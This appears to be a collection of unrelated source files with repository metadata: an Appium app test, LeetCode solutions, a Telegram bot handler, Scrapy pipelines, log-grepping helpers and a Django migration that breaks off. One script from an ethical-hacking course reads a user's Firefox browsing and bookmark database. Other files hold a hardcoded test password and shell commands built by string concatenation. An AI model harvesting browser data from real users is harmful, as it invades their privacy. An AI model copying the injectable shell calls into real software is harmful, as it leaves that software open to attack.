driver = webdriver.Remote(command_executor=port, desired_capabilities={'automationName' : 'UiAutomator2','deviceName': 'Moto G (5)','platformName': 'Android', 'app': 'C:/Users/ze0396/Desktop/AGTGA/APKS/posifon.apk' , 'autoGrantPermissions' : 'true', 'appWaitActivity' : '*.*','fullreset' : 'false','noReset' : 'true' } )
time.sleep(2)
time.sleep(2)
el = ElementFinder(driver, 312,633)
el.click()
el.send_keys('demo4@konto.se')
time.sleep(2)
el = ElementFinder(driver, 312,810)
el.click()
el.send_keys('Sommar2018')
driver.back()
time.sleep(2)
el = ElementFinder(driver, 216,1479)
el.click()
time.sleep(2)
el = ElementFinder(driver, 777,1017)
el.click()
time.sleep(2)
el = ElementFinder(driver, 177,1339)
el.click()
time.sleep(2)
el = ElementFinder(driver, 731,283)
el.click()
time.sleep(2)
el = ElementFinder(driver, 405,920)
el.click()
time.sleep(2)
el = ElementFinder(driver, 554,115)
el.click()
time.sleep(2)
el = ElementFinder(driver, 39,1441)
el.click()
time.sleep(2)
el = ElementFinder(driver, 39,1581)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 48,660)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 969,312)
el.click()
time.sleep(2)
el = ElementFinder(driver, 969,940)
el.click()
driver.press_keycode(3)
driver.close_app()
driver.quit()
print('TestCase finished successfully')
|
[
"32592901+Georgesarkis@users.noreply.github.com"
] |
32592901+Georgesarkis@users.noreply.github.com
|
2b7e4631b4f29246d007524d058aaac3d67a8629
|
4c91879e3bb3ef24cd4d1d2c79eedecc7030c2e8
|
/python/191_number_of_1_bits.py
|
131d0670c4972e14a4560d586b35fe92f7a62424
|
[
"MIT"
] |
permissive
|
PepSalehi/leetcode-soln
|
a47d827c2973ad06d22d0b8b83f2fadfb5b283d1
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
refs/heads/master
| 2020-09-15T14:14:11.422791
| 2018-04-19T15:27:38
| 2018-04-19T15:27:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
"""
Write a function that takes an unsigned integer and returns the number of ’1'
bits it has (also known as the Hamming weight).
For example, the 32-bit integer ’11' has binary representation
00000000000000000000000000001011, so the function should return 3.
Credits:
Special thanks to @ts for adding this problem and creating all test cases.
"""
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
sum1=0
while n>0:
sum1+=n%2
n/=2
return sum1
|
[
"ufjfeng@users.noreply.github.com"
] |
ufjfeng@users.noreply.github.com
|
4b25a66c3105bc9c257188f19dd63ec0e14d457a
|
af7050b659e48a979809a705066baf7cd1a84255
|
/350_intersection-of-two-arrays-ii.py
|
72c4b527f143261a9739c1272e905024c6f6b4b7
|
[] |
no_license
|
zyk930/leetcode
|
b9547cbbeaf0202c2bb3e1a22d30f1ecddd4244e
|
27c9da844550080c41fae60906274347f9e62919
|
refs/heads/master
| 2020-04-10T15:13:45.886717
| 2019-06-04T01:37:10
| 2019-06-04T01:37:10
| 161,101,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/12/21 10:10
# @Author : zyk
'''
给定两个数组,编写一个函数来计算它们的交集。
示例 1:
输入: nums1 = [1,2,2,1], nums2 = [2,2]
输出: [2,2]
示例 2:
输入: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
输出: [4,9]
说明:
输出结果中每个元素出现的次数,应与元素在两个数组中出现的次数一致。
我们可以不考虑输出结果的顺序。
进阶:
如果给定的数组已经排好序呢?你将如何优化你的算法?
如果 nums1 的大小比 nums2 小很多,哪种方法更优?
如果 nums2 的元素存储在磁盘上,磁盘内存是有限的,并且你不能一次加载所有的元素到内存中,你该怎么办?
'''
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
ans = []
nums1.sort()
nums2.sort()
i = j = 0
while i < len(nums1) and j < len(nums2):
if nums1[i] < nums2[j]:
i += 1
elif nums1[i] > nums2[j]:
j += 1
else:
ans.append(nums1[i])
i += 1
j += 1
return ans
|
[
"zhouyk@buaa.edu.cn"
] |
zhouyk@buaa.edu.cn
|
0c8c29ae00b620614383c24a6b9db48d3c488117
|
27a8692c6bed25bd92868a519d95e9570ea204cd
|
/bot/handlers/stickers/remove.py
|
d477b5721bf292f79c74e4fc29fa806ac467e504
|
[
"MIT"
] |
permissive
|
metti61680/sticker-thief
|
f3d7fc49a3337eaead84d4d682fac98cd367fc5a
|
3006b8367f8e09aab1e60428338021b95e5d0b13
|
refs/heads/master
| 2020-12-14T02:23:41.684888
| 2019-12-04T11:27:28
| 2019-12-04T11:27:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,203
|
py
|
import logging
# noinspection PyPackageRequirements
from telegram.ext import (
CommandHandler,
MessageHandler,
ConversationHandler,
CallbackContext,
Filters
)
# noinspection PyPackageRequirements
from telegram import ChatAction, Update
from bot import stickersbot
from bot.strings import Strings
from bot.sticker import StickerFile
import bot.sticker.error as error
from ..fallback_commands import cancel_command
from ...utils import decorators
from ...utils import utils
logger = logging.getLogger(__name__)
WAITING_STICKERS = range(1)
@decorators.action(ChatAction.TYPING)
@decorators.restricted
@decorators.failwithmessage
def on_remove_command(update: Update, _):
logger.info('/remove')
update.message.reply_text(Strings.REMOVE_STICKER_SELECT_STICKER)
return WAITING_STICKERS
@decorators.action(ChatAction.TYPING)
@decorators.failwithmessage
def on_sticker_receive(update: Update, context: CallbackContext):
logger.info('user sent the stciker to add')
sticker = StickerFile(update.message.sticker)
pack_link = utils.name2link(update.message.sticker.set_name)
try:
sticker.remove_from_set(context.bot)
except error.PackInvalid:
update.message.reply_html(Strings.REMOVE_STICKER_FOREIGN_PACK.format(pack_link), quote=True)
except error.PackNotModified:
update.message.reply_html(Strings.REMOVE_STICKER_ALREADY_DELETED.format(pack_link), quote=True)
except error.UnknwonError as e:
update.message.reply_html(Strings.REMOVE_STICKER_GENERIC_ERROR.format(pack_link, e.message), quote=True)
else:
# success
update.message.reply_html(Strings.REMOVE_STICKER_SUCCESS.format(pack_link), quote=True)
finally:
# wait for other stickers
return WAITING_STICKERS
stickersbot.add_handler(ConversationHandler(
name='adding_stickers',
entry_points=[CommandHandler(['remove', 'rem', 'r'], on_remove_command)],
states={
WAITING_STICKERS: [MessageHandler(
Filters.sticker | Filters.document.category('image/png'),
on_sticker_receive
)]
},
fallbacks=[CommandHandler(['cancel', 'c', 'done', 'd'], cancel_command)]
))
|
[
"numeralzeroone@gmail.com"
] |
numeralzeroone@gmail.com
|
672321ebf82e31c14af3274cd5b61a7650715780
|
baf3736092f9aecf79fc717b6d5efc19c5ac3ba9
|
/ArticleSpider_splash/pipelines.py
|
74a77623ba5d113d94d8f288a8a4a0d1124ad2ac
|
[] |
no_license
|
tang1323/ArticleSpider_splash
|
6215224cd5c36a243b950590faf7da2671c4014a
|
992e50f93ba705ffbf3d8282f0c47cd3c9f638f2
|
refs/heads/master
| 2023-04-08T13:07:26.526856
| 2021-04-15T01:55:13
| 2021-04-15T01:55:13
| 358,095,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,016
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import codecs # 可以避免编码的繁锁的工作
import json
from scrapy.pipelines.images import ImagesPipeline
from scrapy.exporters import JsonItemExporter
from twisted.enterprise import adbapi # 可以将mysqldb操作换成一个异步操作
import MySQLdb
import MySQLdb.cursors
# from models.es_types import ArticleType
# from w3lib.html import remove_tags
class ArticlespiderPipeline(object):
def process_item(self, item, spider):
return item
# 保存到json文件中的类
class JsonWithEncodingPipeline(object):# 保存在本地
#自定义json文件的导出
def __init__(self):
self.file = codecs.open('article.json', 'w', encoding = "utf-8")
def process_item(self, item, spider):# process_item一定要这样写,而且参数要一样
lines = json.dumps(dict(item), ensure_ascii= False) + "\n"# 将item转换成dict
self.file.write(lines)# 将文件写入到lines中
return item
def spider_closed(self, spider):# 关闭文件,spider_closed一定要这样写,而且参数要一样
self.file.close()
class MysqlPipeline(object):
# 采用同步的机制写入mysql中,量少的时候可以用这个方法,但量多就采用twisted这个框架去写,在下面那个MysqlTwistedPipline方法就是标准写法
def __init__(self):
self.conn = MySQLdb.connect('localhost', 'tangming', '130796', 'article_spider', charset="utf8",use_unicode = True)
self.cursor = self.conn.cursor()# 执行数据库用cursor
def process_item(self, item, spider):# 写mysql语句的函数
insert_sql = """
insert into cnblogs_article(title, url, url_object_id, front_image_url, front_image_path, praise_nums, comment_nums, tags, content, create_date, fav_nums)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)ON DUPLICATE KEY UPDATE fav_nums = VALUES(fav_nums)
"""
params = list()
params.append(item.get("title", ""))
params.append(item.get("url", ""))
params.append(item.get("url_object_id", ""))
front_image = ",".join(item.get("front_image_url", []))# 只有这个还是list类型,只能在最后入库的这里.join转换成字符串类型
params.append(front_image)
params.append(item.get("front_image_path", ""))
params.append(item.get("praise_nums", 0))# 没有数据则为0
params.append(item.get("comment_nums", 0))# 没有数据则为0
params.append(item.get("tags", ""))
params.append(item.get("content", []))
params.append(item.get("create_date", "1970-07-01"))
params.append(item.get("fav_nums", 0))# 没有数据则为0
self.cursor.execute(insert_sql,tuple(params))# 同步执行,如果不执行完这步就不会执行完下一步
self.conn.commit()# 同步执行,如果不执行完这步就不会执行完下一步
# 那么就需要一种异步执行
return item
# 这就是异步插入数据库
class MysqlTwistedPipline(object):
def __init__(self, dbpool):# 接收参数
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings):
# from MySQLdb.cursors import DictCursor
dbparms = dict(
host = settings["MYSQL_HOST"],
db = settings["MYSQL_DBNAME"],
user = settings["MYSQL_USER"],
password = settings["MYSQL_PASSWORD"],
charset ='utf8',
cursorclass = MySQLdb.cursors.DictCursor,
use_unicode = True
)
dbpool = adbapi.ConnectionPool("MySQLdb", **dbparms)# ConnectionPool这是一个连接池,这是一个关键
return cls(dbpool)
def process_item(self, item, spider):# 写mysql语句的函数
# 使用twisted 将mysql插入变成异步执行
query = self.dbpool.runInteraction(self.do_insert, item) # dbpool是一个容器
query.addErrback(self.handle_error, item, spider) # 处理异常,handle_error是随便定义的一个方法,item和spider是自己返回一个错误信息,想要返回什么自己往里加
return item
def handle_error(self,failure, item, spider): # failure是自己传的
# 处理异步插入的异常
print(failure) # 这一步很重要,是调试的根本入口,就是在爬取数据入数据库的时候出现异常都 是这里调试出来的
def do_insert(self, cursor, item):# 这个cursor是adbapi自己传进来的
# 执行具体的插入
# 根据不同的item构建不同的sql语句并插入到mysql中
# insert_sql = """
# insert into cnblogs_article(title, url, url_object_id, front_image_url, front_image_path, praise_nums, comment_nums, tags, content, create_date, fav_nums)
# VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)ON DUPLICATE KEY UPDATE create_date = VALUES(create_date)
# """
# params = list()
# params.append(item.get("title", ""))
# params.append(item.get("url", ""))
# params.append(item.get("url_object_id", ""))
# front_image = ",".join(item.get("front_image_url", []))
# params.append(front_image)
# params.append(item.get("front_image_path", ""))
# params.append(item.get("praise_nums", 0)) # 没有数据则为0
# params.append(item.get("comment_nums", 0)) # 没有数据则为0
# params.append(item.get("tags", ""))
# params.append(item.get("content", []))
# params.append(item.get("create_date", "1970-07-01"))
# params.append(item.get("fav_nums", 0)) # 没有数据则为0
# cursor.execute(insert_sql, tuple(params))
insert_sql, params = item.get_insert_sql()
cursor.execute(insert_sql, params)
class JsonExporterPipleline(object):
# 调用scrapy提供的json export导出json文件
def __init__(self):
self.file = codecs.open('articleexport.json', 'wb')
self.exporter = JsonItemExporter(self.file, encoding = "utf-8", ensure_ascii= False)
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
self.file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
# 只处理封面图片
class ArticleImagePipeline(ImagesPipeline):
def item_completed(self, results, item, info):
# 判断如果没有封面图片时不执行以下语句,有就执行,好比知乎没有封面图片
if "front_image_url" in item:
image_file_path = ""
for ok, value in results:
image_file_path = value["path"]
item["front_image_path"] = image_file_path
return item
|
[
"1171242903@qq.com"
] |
1171242903@qq.com
|
d0db4dd53fc928a47070993d812e526112a25bb3
|
4a0f8c5c0e8324fa614da776f2a704b5c369ccbb
|
/Contact_maps/dealFile.py
|
5816c559c07cbd917443fb8e7f1b4a6c81f4de53
|
[] |
no_license
|
magic2du/contact_matrix
|
9f8ae868d71e7e5c8088bf22a9407ea3eb073be6
|
957e2ead76fabc0299e36c1435162edd574f4fd5
|
refs/heads/master
| 2021-01-18T21:15:07.341341
| 2015-09-16T02:14:53
| 2015-09-16T02:14:53
| 24,237,641
| 0
| 0
| null | 2015-09-10T19:58:24
| 2014-09-19T16:48:37
| null |
UTF-8
|
Python
| false
| false
| 2,197
|
py
|
import os
def readListFile(filename):#read file:filename lines into list
data_file = open(filename)
data = []
for line in data_file.readlines():
line = line.strip()
#print line
data.append(line)
data_file.close()
print "number of lines in %s:" %filename +str(len(data))
return data
def readGrepFile(filename):#read ddis greped log File into list.ie SUCCESS_log_file
data_file = open(filename)
data = []
for line in data_file.readlines():
temp1 = line.split(" ")
line = temp1[3].split(",")
line=line[0]
line=line.strip()
data.append(line)
''' print(line)
line = line.split(" ")
t1 = line[1].split(":")
t2 = line[2].split(":")
tmp = [float(t1[1]), float(t2[1]), int(line[0])]
data.append(tmp)
print tmp'''
print "number of lines in %s:" %filename +str(len(data))
data_file.close()
return data
def writeListFile(filename,lst):# write lst into filename.
data_file = open(filename,'w')
for item in lst:
data_file.write("%s\n" % item)
print "number of lines wrote in %s:" %filename +str(len(lst))
data_file.close()
def dealLogFile(filename,listfile):
#grep log file(filename) to ERROR and SUCCESS file: Get the Notfinished ddis in todolist file (listfile) write into NotFinished_log
sh='grep ERROR: '+filename+'>ERROR_'+filename
sh2='grep SUCCESS: '+filename+'>SUCCESS_'+filename
os.system(sh)
os.system(sh2)
List1=readListFile(listfile)
List2=readGrepFile('SUCCESS_'+filename)
List3=readGrepFile('ERROR_'+filename)
List4=list(set(List1)-set(List2)-set(List3))
writeListFile('NotFinished_'+filename,List4)
def grepLogFile(filename):
#grep log file(filename) to ERROR and SUCCESS file:
sh='grep ERROR: '+filename+'>ERROR_'+filename
sh2='grep SUCCESS: '+filename+'>SUCCESS_'+filename
os.system(sh)
print sh
os.system(sh2)
print sh2
def readDDIsFile(filename):#read ddi file into a list with two domain names seperated.
data_file = open(filename)
data = []
for line in data_file.readlines():
line = line.strip()
try:
[domain1,domain2]=line.split('_int_')
data.append([domain1,domain2])
except:
print line
data_file.close()
print "number of ddis in %s:" %filename +str(len(data))
return data
|
[
"magic2du@gmail.com"
] |
magic2du@gmail.com
|
9be4c0cfe1528de5ee29c120480cb7e74ee1c110
|
b3ad6d480873ac91fc284efc6341568649898684
|
/cohort/week6/cs1.py
|
b50661dfbe30716c9a6b8392c7f7626cd65dd870
|
[
"MIT"
] |
permissive
|
jamestiotio/DW2020
|
e88af5f84f477e911b8414c02893da039fff9cf0
|
1639ccbcf77b64719bdc29bf2a373d19296fbd75
|
refs/heads/master
| 2022-10-30T12:48:39.147705
| 2022-08-14T12:16:35
| 2022-08-14T12:16:35
| 269,898,881
| 0
| 1
|
MIT
| 2021-11-04T16:30:20
| 2020-06-06T07:03:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 142
|
py
|
def reverse(string):
new_string = ""
for char in range(1, len(string) + 1):
new_string += string[-char]
return new_string
|
[
"jamestiotio@gmail.com"
] |
jamestiotio@gmail.com
|
975de9975a9a39cbe4c0d7727322685bc5762de1
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03645/s702030481.py
|
0676433bb304179255b0f58e28e7315e9f4ba85a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
from sys import stdin
def input():
return stdin.readline().strip()
n, m = map(int, input().split())
edge = [[] for _ in range(n)]
for _ in range(m):
i, j = map(int, input().split())
i -= 1
j -= 1
edge[i].append(j)
edge[j].append(i)
for i in edge[0]:
if n - 1 in edge[i]:
print('POSSIBLE')
exit()
else:
print('IMPOSSIBLE')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
a89f7551c6e7110c925d5c588dffb97eee504470
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
ce1ec660353ce6c9b3396ee91e02d9336d97ded8
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:99d3d433550637101bcb96e96fa3ad768bd4fcf5d594eb911c360868a4a5bf1f
size 2083
|
[
"github@cuba12345"
] |
github@cuba12345
|
c2e523ab1ff7e56a1209026225b6a1f5d1049f9a
|
d62863d049c0206bfa744ca4c9e886030bfce1ab
|
/apps/sw_shop/sw_order/filters.py
|
8fbf2cab68517611516c4be1eb8e79e99f52ae1a
|
[] |
no_license
|
jurgeon018/box
|
51738b99e640202936ed72357d3c67d2517e589b
|
50b84a0afa73fab85a00eef54194f3c126d15397
|
refs/heads/master
| 2021-07-17T13:37:08.665292
| 2020-10-15T09:50:33
| 2020-10-15T09:50:33
| 232,013,297
| 0
| 1
| null | 2020-03-27T02:16:44
| 2020-01-06T03:01:34
|
Python
|
UTF-8
|
Python
| false
| false
| 142
|
py
|
from admin_auto_filters.filters import AutocompleteSelect
class TagsFilter(AutocompleteSelect):
title = 'тег'
field_name = 'tags'
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
d1548533bbd4772134b1eb35f4625917f8311929
|
4c2c1775b6b319ae07155f46e70a6726ab0980c2
|
/algo/algo_code/personal/cvr_space/model_train_exp/script/model_predict.py
|
d83956c20f098ea44510c425f8fc4512584682ff
|
[] |
no_license
|
kiminh/util
|
8e4b204849a57941120e37c9330772f03c8892d0
|
763a71031d9c0ef207b87dc03ebc55208a2dd5ad
|
refs/heads/master
| 2022-06-09T06:09:13.221754
| 2020-04-27T04:23:00
| 2020-04-27T04:23:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 385
|
py
|
import sys
import math
model_dict = {}
for raw in open(sys.argv[1]):
felds = raw.strip("\n\r").split(" ")
if len(felds) < 2:
continue
model_dict[felds[0]] = float(felds[1])
for raw in open(sys.argv[2]):
s = 0
for sp in raw.strip().split()[1:]:
w = model_dict.get(sp, 0)
s += model_dict.get(sp, 0)
print 1.0 / (1.0 + math.exp(-s))
|
[
"ling@lingdeMacBook-Air.local"
] |
ling@lingdeMacBook-Air.local
|
6d72c628644e2d398d8db125a9bc5a7d8ef0a069
|
79baf4404e51bdc0f33038b3b16bea86ff09e82f
|
/azext_iot/sdk/deviceupdate/controlplane/operations/__init__.py
|
fcfbd4b1f52e9fbba906f0b37ee993a23e66a0b3
|
[
"MIT"
] |
permissive
|
Azure/azure-iot-cli-extension
|
80b6cb29e907f7512c7361a85d6bfdea5ae2dd9e
|
bdbe65c3874ff632c2eba25c762e9ea8e9175b5f
|
refs/heads/dev
| 2023-09-04T10:57:16.118442
| 2023-08-28T17:12:05
| 2023-08-28T17:12:05
| 103,456,760
| 95
| 80
|
NOASSERTION
| 2023-09-13T00:02:54
| 2017-09-13T22:04:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,443
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._device_update_operations import DeviceUpdateOperationsMixin
from ._accounts_operations import AccountsOperations
from ._instances_operations import InstancesOperations
from ._private_endpoint_connections_operations import PrivateEndpointConnectionsOperations
from ._private_link_resources_operations import PrivateLinkResourcesOperations
from ._private_endpoint_connection_proxies_operations import PrivateEndpointConnectionProxiesOperations
from ._operations import Operations
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
'DeviceUpdateOperationsMixin',
'AccountsOperations',
'InstancesOperations',
'PrivateEndpointConnectionsOperations',
'PrivateLinkResourcesOperations',
'PrivateEndpointConnectionProxiesOperations',
'Operations',
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
3d556d8e0c6be1368b829f2f9e0d84e4eea75160
|
db12b990924703cd74748d8585cd9c11fafa6746
|
/h2o-py/h2o/schemas/metadata.py
|
9582a1aaee3cc62f7c74ffa2f0fa2e14384a9fc0
|
[
"Apache-2.0"
] |
permissive
|
h2oai/h2o-3
|
919019a8f297eec676011a9cfd2cc2d97891ce14
|
d817ab90c8c47f6787604a0b9639b66234158228
|
refs/heads/master
| 2023-08-17T18:50:17.732191
| 2023-08-17T16:44:42
| 2023-08-17T16:44:42
| 17,371,412
| 6,872
| 2,345
|
Apache-2.0
| 2023-09-14T18:05:40
| 2014-03-03T16:08:07
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
# -*- encoding: utf-8 -*-
#
# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)
#
# noinspection PyUnresolvedReferences
from h2o.utils.compatibility import * # NOQA
class H2OMetadataV3(object):
@classmethod
def make(cls, json_kv_pairs):
return cls(json_kv_pairs)
def __init__(self, json_kv_pairs):
self._schemas = next((v for k, v in json_kv_pairs if k == 'schemas'), []) or []
self._schema = self._schemas[0] if self._schemas else None
self._routes = next((v for k, v in json_kv_pairs if k == 'routes'), []) or []
@property
def name(self):
return self._schema.get('name') if self._schema else None
@property
def fields(self):
return [_Field(f) for f in self._schema.get('fields')] if self._schema else None
@property
def routes(self):
return [_Route(r) for r in self._routes]
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
class _Field(object):
def __init__(self, j_field):
self._field = j_field
@property
def name(self):
return self._field.get('name')
@property
def is_schema(self):
return self._field.get('is_schema')
@property
def help(self):
return self._field.get('help')
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
class _Route(object):
def __init__(self, j_route):
self._route = j_route
@property
def http_method(self):
return self._route.get('http_method')
@property
def url_pattern(self):
return self._route.get('url_pattern')
@property
def summary(self):
return self._route.get('summary')
@property
def input_schema(self):
return self._route.get('input_schema')
@property
def output_schema(self):
return self._route.get('output_schema')
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
|
[
"noreply@github.com"
] |
h2oai.noreply@github.com
|
734bf8211cf76d87497a9023f0a6036d2c89b55b
|
6a33cb94d4af1d8a7329ddc6c9d42f870c35bb2f
|
/python/euler88.py
|
438947a9585065bb73e52c6e4fe46d5db173dc3c
|
[] |
no_license
|
vochong/project-euler
|
836321cc8e7d2e7cdf22b3b136d44dcba74a8701
|
6a0c7103861ff825bf84800b6e2e62819a41e36d
|
refs/heads/master
| 2020-04-29T10:41:48.487159
| 2018-09-19T00:13:34
| 2018-09-19T00:13:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 385
|
py
|
def prodsum(prod, sm, facs, curfac, mins):
k = prod - sm + facs
if k < 12000:
mins[k] = min(mins[k], prod)
for fac in range(curfac, 24000/prod):
prodsum(prod*fac, sm+fac, facs+1, fac, mins)
def euler88():
mins = [24000]*12000
prodsum(1, 1, 1, 2, mins)
return sum(set(mins[2:]))
if __name__ == "__main__":
print euler88()
|
[
"kueltz.anton@gmail.com"
] |
kueltz.anton@gmail.com
|
0de714e49f871d8ef0eaad488040bcbabbacca73
|
f3cdb2bae2ca6cbd045941ae0c2f4052e52de622
|
/p2p/dataset.py
|
04e28cc0ef5d167401736ee3081182e3dbb724bd
|
[
"Apache-2.0"
] |
permissive
|
IQTLabs/3-D_DataAugmentation
|
bab6aead07235cccb2056b0ce25179e5bb871a82
|
3eb7fe156906df46151de5c4472274a1ccdcfbed
|
refs/heads/master
| 2023-01-21T15:57:39.173956
| 2020-12-03T20:23:18
| 2020-12-03T20:23:18
| 298,663,332
| 0
| 0
|
Apache-2.0
| 2023-01-23T13:56:28
| 2020-09-25T19:32:59
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,028
|
py
|
import numpy as np
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
__all__ = ['P2PDataset']
class P2PDataset(Dataset):
""" Pose to Pose dataset definition loads two frame/pose pairs
"""
def __init__(self, df=None, transform=None, data_path=''):
""" Dataset initialization
Parameters
----------
df : pd.DataFrame
Dataframe with datapoint metadata
transform : torchvision.transforms
Frame preprocessing transforms. Nt applied to poses
data_path : str
Global path to data directory
Returns
-------
"""
self.df = df
self.data_path = data_path
if transform is None:
self.transform = transforms.ToTensor()
else:
self.transform = transform
self.to_tensor = transforms.ToTensor()
def __getitem__(self, idx):
""" Returns dataset item
Parameters
----------
idx : int
Index for desired datapoint
Returns
-------
frames[0] : torch.tensor
First (input) frame
frames[1] : torch.tensor
Second (target) frame
pose : torch.tensor
Second (target) pose
"""
entry = self.df.iloc[idx]
dir_path = '{}/{}/{}'.format(self.data_path,
entry['name'], entry['snippet'])
index = np.random.choice([x for x in range(5)], 2, replace=False)
frames = [self.transform(Image.open(
'{}/frame_{}.jpg'.format(dir_path, x))) for x in index]
pose = self.to_tensor(Image.open(
'{}/pose_{}.jpg'.format(dir_path, index[-1])))
return frames[0], frames[1], pose
def __len__(self):
""" Lenght of dataset
Parameters
----------
Returns
-------
len : int
Len of dataframe/dataset
"""
return len(self.df)
|
[
"mllomnitz@gmail.com"
] |
mllomnitz@gmail.com
|
c2615df1c73b8edf1406f870f6e2f819b8bd4f9f
|
25d4c31d5ebe470118b14beb84f3cd1e53d99c15
|
/01_Tutorials/Udemy Kurs Ehical Hacking/06_Praxisprojekt_Firefox_Daten_auslesen/48_Profilordner_Firefox_Alle_OS_Call_function.py
|
a59ecffd3590e860a7e464367aafb21873f9b8a1
|
[] |
no_license
|
daltdoerfer/Python_Templates-1
|
ea4b59489feb7b7617e81b7c94d4375dbf25def3
|
c2471cebeaf20bbfdfd3fd263d458e5a67ad8d1e
|
refs/heads/master
| 2023-05-10T15:07:10.109280
| 2021-06-08T06:45:53
| 2021-06-08T06:45:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 846
|
py
|
# Doku places.sqlite https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
# z.B: Bookmarks in moz_boookmarks
import os
import sqlite3 # Datenbankspaket zum auslesen der Datenbank
import pandas as pd
from get_firefox_path import get_firefox_path
# Alternativ: import get_firefox_path as gfp # -> Hier nüsste jedoch der Aufruf der Funktions wie folgt lauten gfd.get_firefox_path()
##############################################################################
# Funktionsaufruf
##############################################################################
path = get_firefox_path("places.sqlite")
#os.startfile('C:\\Users\\James/AppData/Roaming/Mozilla/Firefox/Profiles') # Öffnen zum betrachten
conn = sqlite3.connect(path)
print(conn)
# Ausgabe in Pandas
df = pd.read_sql("SELECT * FROM moz_bookmarks", conn)
print(df)
|
[
"daltdoerfer@yahoo.com"
] |
daltdoerfer@yahoo.com
|
4f442defc3e20cd08d0d0bd1c7cfecc372987eaf
|
f52997ac7e1b41f34018c3a0028ced8638072b2b
|
/src/feedback/migrations/0002_migrate_search_feedback.py
|
99e69225ca6320d0a38a794a12ad8bb49a371897
|
[
"MIT"
] |
permissive
|
uktrade/digital-workspace-v2
|
49fae1fca819b625c6f6949fb5ce51b89fbcab96
|
7e328d0d55c9aa73be61f476823a743d96e792d0
|
refs/heads/main
| 2023-09-03T12:03:47.016608
| 2023-09-01T12:07:55
| 2023-09-01T12:07:55
| 232,302,840
| 6
| 0
|
MIT
| 2023-09-13T15:50:24
| 2020-01-07T10:41:18
|
Python
|
UTF-8
|
Python
| false
| false
| 999
|
py
|
# Generated by Django 4.1.10 on 2023-08-08 14:35
from django.db import migrations
def migrate_search_feedback(apps, schema_editor):
Feedback = apps.get_model("django_feedback_govuk", "Feedback")
SearchFeedbackV1 = apps.get_model("feedback", "SearchFeedbackV1")
for feedback in Feedback.objects.all():
search_feedback = SearchFeedbackV1.objects.create(
submitter=feedback.submitter,
satisfaction=feedback.satisfaction,
comment=feedback.comment,
)
# Update the base feedback model with the submitted_at field to override the auto_now_add
SearchFeedbackV1.objects.filter(pk=search_feedback.pk).update(
submitted_at=feedback.submitted_at,
)
feedback.delete()
class Migration(migrations.Migration):
initial = True
dependencies = [
